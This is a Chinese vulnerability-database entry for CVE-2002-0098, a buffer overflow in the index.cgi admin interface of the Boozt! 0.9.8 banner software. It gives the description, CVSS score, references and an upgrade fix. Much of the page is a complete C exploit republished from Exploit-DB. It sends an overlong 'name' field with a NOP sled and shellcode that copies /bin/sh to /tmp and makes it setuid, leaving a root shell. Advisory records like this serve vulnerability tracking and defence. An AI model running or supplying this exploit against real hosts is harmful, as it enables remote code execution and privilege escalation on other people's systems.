CVE-2002-0098
CVSS7.5
发布时间 :2002-03-25 00:00:00
修订时间 :2016-10-17 22:16:04
NMCOE    

[原文]Buffer overflow in index.cgi administration interface for Boozt! Standard 0.9.8 allows local users to execute arbitrary code via a long name field when creating a new banner.


[CNNVD]Boozt!远程缓冲区溢出漏洞(CNNVD-200203-058)

        
        Boozt!是Linux平台下一个广告条管理软件。
        Boozt!软件存在缓冲区溢出漏洞,可以使远程攻击者在运行Boozt!的主机上执行任意指令。
        当用户通过管理界面的index.cgi创建一个新的广告条时,在名字字段中输入超长的字串会导致程序缓冲区溢出,从而使执行任意指令或造成拒绝服务攻击成为可能。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0098
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0098
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-058
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101027773404836&w=2
(UNKNOWN)  BUGTRAQ  20020105 BOOZT! Standard 's administration cgi vulnerable to buffer overflow
http://online.securityfocus.com/archive/1/249219
(UNKNOWN)  BUGTRAQ  20020109 BOOZT! Standard CGI Vulnerability : Exploit Released
http://online.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3787
(VENDOR_ADVISORY)  BID  3787
http://www.boozt.com/news_detail.php?id=3
(UNKNOWN)  CONFIRM  http://www.boozt.com/news_detail.php?id=3
http://www.iss.net/security_center/static/7790.php
(VENDOR_ADVISORY)  XF  boozt-long-name-bo(7790)

- 漏洞信息

Boozt!远程缓冲区溢出漏洞
高危 未知
2002-03-25 00:00:00 2005-05-02 00:00:00
远程  
        
        Boozt!是Linux平台下一个广告条管理软件。
        Boozt!软件存在缓冲区溢出漏洞,可以使远程攻击者在运行Boozt!的主机上执行任意指令。
        当用户通过管理界面的index.cgi创建一个新的广告条时,在名字字段中输入超长的字串会导致程序缓冲区溢出,从而使执行任意指令或造成拒绝服务攻击成为可能。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止此软件的使用,或者设置Web访问验证,确保只有可信任的用户能够访问到该管理界面。
        厂商补丁:
        Solutions 4u ltd.
        -----------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.boozt.com/

- 漏洞信息 (21205)

Boozt 0.9.8 Buffer Overflow Vulnerability (EDBID:21205)
linux remote
2002-01-07 Verified
0 Rafael San Miguel Carrasco
N/A [点击下载]
source: http://www.securityfocus.com/bid/3787/info

Boozt! is a free open source banner management software for Linux hosts.

An issue has been reported which could allow for a user to execute arbitrary code on a Boozt! host.

This is acheivable when a Boozt! user attempts to create a new banner, if the name field is specified with arbitrary characters of excessive length a buffer overflow occurs. 

/* -----------------------------------------

        BOOZT! Standard 0.9.8 CGI vulnerability exploit

        Rafael San Miguel Carrasco

        rsanmcar@alum.uax.es

   -----------------------------------------  */


#include <netinet/in.h>
#define PORT 8080
#define BUFLEN 1597
#define RET 0xbffff297
#define NOP 0x90

int main (int argc, char **argv) {

        int sockfd, i, cont;
        struct sockaddr_in dest;
        int html_len = 15;
        char cgicontent[2048];
        char buf[BUFLEN];

        char shellcode[]=
               
"\x29\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x02\xeb\x05\x29\xc0\x40\xcd\x80\x29\xc0\x29\xdb\x29\xc9"
               
"\xb0\x46\xcd\x80\xeb\x2a\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36\x8d\x5e\x0b\x89\x5e\x3a\x29"
               
"\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x31\x89\x46\x3e\x87\xf3\xb0\x0b\x8d\x4b\x32\x8d\x53\x3e"
               
"\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e"
               
"\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34\x37\x35\x35\x20"
                "\x2f\x74\x6d\x70\x2f\x73\x68";

        char *html[15] = {
                "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n",
                "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
*/*\n",
                "Referer:
http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1\n",
                "Accept-Language: es, en\n",
                "Content-Type: application/x-www-form-urlencoded\n",
                "UA-pixels: 640x480\n",
                "UA-color: color8\n",
                "UA-OS: Windows 95\n",
                "UA-CPU: x86\n",
                "User-Agent: Mozilla/2.0 (compatible; MSIE 3.0; Windows 95)\n",
                "Host: 10.0.0.1:8080\n",
                "Connection: Keep-Alive\n",
                "Content-Length: 1776\n",
                "Pragma: No-Cache\n",
                "\n",
        };

        if (argc < 2) {
                printf ("usage: %s <IP>\n", argv[0]);
                exit (-1);
        }

        printf ("----------\n");
        printf (" BOOZT! Standard exploit\n");
        printf ("----------\n");
        printf ("Rafael San Miguel Carrasco (_kiss_)\n");
        printf ("rsanmcar@alum.uax.es\n");
        printf ("----------\n");

        for (i = 0; i < BUFLEN; i+=4)
                *( (long *) &buf[i]) = RET;

        for (i = 0; i < (BUFLEN - 16); i++)
                buf[i] = NOP;


        cont = 0;

        for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
                buf[i] = shellcode [cont++];

        strcpy (cgicontent, "name=");
        strncat (cgicontent, buf, sizeof (buf));
        strcat (cgicontent,
"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&source_flash_path=Browse...&script_name=&input=
1&section=5&sent=1&submit=Create+New+Banner");

        printf ("connecting ...\n");

        if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) {
                perror ("socket");
                exit (-1);
        }

        bzero (&dest, sizeof (dest));
        dest.sin_family = AF_INET;
        dest.sin_port = htons (PORT);
        dest.sin_addr.s_addr = inet_addr (argv[1]);

        if (connect (sockfd, &dest, sizeof (dest)) < 0) {
                perror ("connect");
                exit (-1);
        }

        printf ("connected. sending buffer ...\n");

        for (i = 0; i < html_len; i++) {

                if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
{
                        perror ("write");
                        exit (-1);
                }
        }

        if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
{
                perror ("write cgicontent");
                exit (-1);
        }

        if (close (sockfd) < 0) {
                perror ("close");
                exit (-1);
        }

        printf ("there should be a rootshell in /tmp.\n\n");

        return 0;
}		

- 漏洞信息

2017
Boozt! index.cgi Banner Creation Name Field Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2002-01-05 Unknow
2002-01-05 Unknow

- 解决方案

Upgrade to version 0.9.9alpha or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站